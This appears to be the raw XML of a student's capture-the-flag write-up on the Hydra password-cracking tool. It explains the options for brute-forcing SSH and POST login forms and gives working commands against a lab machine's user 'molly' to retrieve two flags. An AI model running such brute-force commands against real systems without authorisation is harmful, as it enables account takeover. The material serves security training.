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B3FB" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD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The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute force FTP with the username being user and a password list being passlist.txt, we’d use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE46585" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD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hydra -l user -P passlist.txt ftp://MACHINE_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34178824" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD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For this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEAB6B" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD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SSH</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1545" w:tblpY="415"/>
        <w:tblW w:w="934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513"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="5B3B9D7E" w14:textId="77777777" w:rsidTr="002D1127">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1835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7D5BE0B7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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7513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48C8D261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2D1127" w:rsidRPr="002D1127" w14:paraId="270A12D1" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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915C4D7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-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751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32D2C51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specifies the (SSH) username for login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="6BCF0F12" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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880AB46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-P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751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B3783FC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indicates a list of passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="394B948F" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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1820C0C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-t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751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514C80D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sets the number of threads to spawn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6492CF48" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD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hydra -l &lt;username&gt; -P &lt;full path to pass&gt; MACHINE_IP -t 4 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCFFC7F" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD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For example, hydra -l root -P passwords.txt MACHINE_IP -t 4 ssh will run with the following arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F165326" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00311021" w:rsidRDefault="00C373AD" w:rsidP="003110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11021">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hydra will use root as the username for ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680CFCB" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00311021" w:rsidRDefault="00C373AD" w:rsidP="003110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11021">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>It will try the passwords in the passwords.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B0634E" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00311021" w:rsidRDefault="00C373AD" w:rsidP="003110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11021">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>There will be four threads running in parallel as indicated by -t 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE88E5" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD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Post Web Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F367FB3" w14:textId="77777777" w:rsidR="00C373AD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We can use Hydra to brute force web forms too. You must know which type of request it is making; GET or POST methods are commonly used. You can use your browser’s network tab (in developer tools) to see the request types or view the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC3DD1" w14:textId="77777777" w:rsidR="00666090" w:rsidRDefault="00666090" w:rsidP="002D11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371757" w14:textId="200C4D59" w:rsidR="00DD5EA5" w:rsidRPr="00C373AD" w:rsidRDefault="00DD5EA5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sudo hydra &lt;username&gt; &lt;wordlist&gt; MACHINE_IP http-post-form "&lt;path&gt;:&lt;login_credentials&gt;:&lt;invalid_response&gt;"</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1535" w:tblpY="469"/>
        <w:tblW w:w="923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6096"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="31839C87" w14:textId="77777777" w:rsidTr="002D1127">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3141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035A9AC6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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6096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45F05F44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2D1127" w:rsidRPr="002D1127" w14:paraId="55833FDE" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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118C54E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-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="60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E560825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the username for (web form) login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="5A19E9B6" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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7360BFB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-P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="60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F7657FA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the password list to use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="2B55B8A1" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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F27C76E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http-post-form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="60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41A9869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the type of the form is POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="2285D7BC" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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298D314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&lt;path&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="60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BE670E6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the login page URL, for example, login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="6C62F9D5" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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3B21946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&lt;login_credentials&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="60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2803AF7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the username and password used to log in, for example, username=^USER^&amp;password=^PASS^</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="5075C51A" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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C1753FF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&lt;invalid_response&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="60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5FE1B9B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part of the response when the login fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1127" w:rsidRPr="002D1127" w14:paraId="57B8BA08" w14:textId="77777777" w:rsidTr="002D1127">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="314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1174E56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-V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="609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625158F" w14:textId="77777777" w:rsidR="002D1127" w:rsidRPr="00C373AD" w:rsidRDefault="002D1127" w:rsidP="002D112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373AD">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>verbose output for every attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43EFF9D0" w14:textId="77777777" w:rsidR="00BC77C3" w:rsidRDefault="00BC77C3" w:rsidP="002D112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EEA235" w14:textId="51DA6F63" w:rsidR="00C373AD" w:rsidRPr="00C373AD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Below is a more concrete example Hydra command to brute force a POST login form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FC4298" w14:textId="1A12275F" w:rsidR="00242A6C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hydra -l &lt;username&gt; -P &lt;wordlist&gt; MACHINE_IP http-post-form "/:username=^USER^&amp;password=^PASS^:F=incorrect" -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8988F9" w14:textId="244C2A37" w:rsidR="00C373AD" w:rsidRPr="005F380B" w:rsidRDefault="00C373AD" w:rsidP="005F38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F380B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The login page is only /, i.e., the main IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D587633" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="005F380B" w:rsidRDefault="00C373AD" w:rsidP="005F38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F380B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The username is the form field where the username is entered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB4FC7" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="005F380B" w:rsidRDefault="00C373AD" w:rsidP="005F38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F380B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The specified username(s) will replace ^USER^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0698D" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="005F380B" w:rsidRDefault="00C373AD" w:rsidP="005F38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F380B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The password is the form field where the password is entered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0DFB0C" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="005F380B" w:rsidRDefault="00C373AD" w:rsidP="005F38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F380B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The provided passwords will be replacing ^PASS^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264D75F" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="005F380B" w:rsidRDefault="00C373AD" w:rsidP="005F38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F380B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Finally, F=incorrect is a string that appears in the server reply when the login fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A73373" w14:textId="77777777" w:rsidR="00C373AD" w:rsidRPr="00C373AD" w:rsidRDefault="00C373AD" w:rsidP="002D1127">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C373AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>You should now have enough information to put this to practice and brute force your credentials to the deployed machine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603309A" w14:textId="77777777" w:rsidR="00DE0065" w:rsidRPr="00DE0065" w:rsidRDefault="00DE0065" w:rsidP="00DE006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6C655B" w14:textId="77777777" w:rsidR="00DE0065" w:rsidRPr="00DE0065" w:rsidRDefault="00DE0065" w:rsidP="00DE006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790CA0" w14:textId="77777777" w:rsidR="00DE0065" w:rsidRPr="00DE0065" w:rsidRDefault="00DE0065" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Use Hydra to bruteforce molly's web password. What is flag 1?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE65BA5" w14:textId="56021E11" w:rsidR="00DE0065" w:rsidRDefault="00DE0065" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hydra -l molly -P rockyou.txt 10.10.102.63 http-post-form "/login:username=^USER^&amp;password=^PASS^:F=incorrect" -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11274ACD" w14:textId="774FDD79" w:rsidR="00CD5BFC" w:rsidRDefault="000C25E7" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C25E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17D863" wp14:editId="5BD508B5">
            <wp:extent cx="5456393" cy="472481"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="44786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63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E46D" w14:textId="7617FEC1" w:rsidR="00F47C82" w:rsidRPr="00DE0065" w:rsidRDefault="00F47C82" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F47C8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1952CB3" wp14:editId="1BE1E128">
            <wp:extent cx="5943600" cy="1442085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="118248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8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D380" w14:textId="1656BD28" w:rsidR="00767A03" w:rsidRDefault="00DE0065" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Use Hydra to bruteforce molly's SSH password. What is flag 2?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61304E6B" w14:textId="177B5702" w:rsidR="00ED75BD" w:rsidRDefault="00ED75BD" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED75BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hydra -l molly -P rockyou.txt 10.10.102.63 -t 4 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB54AD4" w14:textId="79DB1ED3" w:rsidR="006D4757" w:rsidRDefault="006D4757" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D475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3A7F88" wp14:editId="5BD8E708">
            <wp:extent cx="5943600" cy="1183640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="213618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6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8AAC" w14:textId="63ECFA08" w:rsidR="009F4A8B" w:rsidRPr="002D1127" w:rsidRDefault="009F4A8B" w:rsidP="00DE0065">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4A8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40EC76" wp14:editId="76BC1F64">
            <wp:extent cx="5288738" cy="3071126"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="132330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00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A8B" w:rsidRPr="002D1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A23CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02D8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B0181"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA7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9446C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67D4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D1ED0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9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815330">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="780497032">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1194614846">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="3839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68"/>
    <w:rsid w:val="000C25E7"/>
    <w:rsid w:val="001A1021"/>
    <w:rsid w:val="00242A6C"/>
    <w:rsid w:val="00280141"/>
    <w:rsid w:val="002D1127"/>
    <w:rsid w:val="00311021"/>
    <w:rsid w:val="005F380B"/>
    <w:rsid w:val="00666090"/>
    <w:rsid w:val="006D4757"/>
    <w:rsid w:val="007313E3"/>
    <w:rsid w:val="00767A03"/>
    <w:rsid w:val="009F4A8B"/>
    <w:rsid w:val="00A902F6"/>
    <w:rsid w:val="00B136ED"/>
    <w:rsid w:val="00BC77C3"/>
    <w:rsid w:val="00C373AD"/>
    <w:rsid w:val="00C86599"/>
    <w:rsid w:val="00CD5BFC"/>
    <w:rsid w:val="00DD5EA5"/>
    <w:rsid w:val="00DE0065"/>
    <w:rsid w:val="00ED75BD"/>
    <w:rsid w:val="00F35C68"/>
    <w:rsid w:val="00F4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385D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CB1DBCB5-3748-409D-AAB5-FB740C12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7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73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73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AnonymousKey</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>AnonymousKey</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-27T06:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-29T11:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>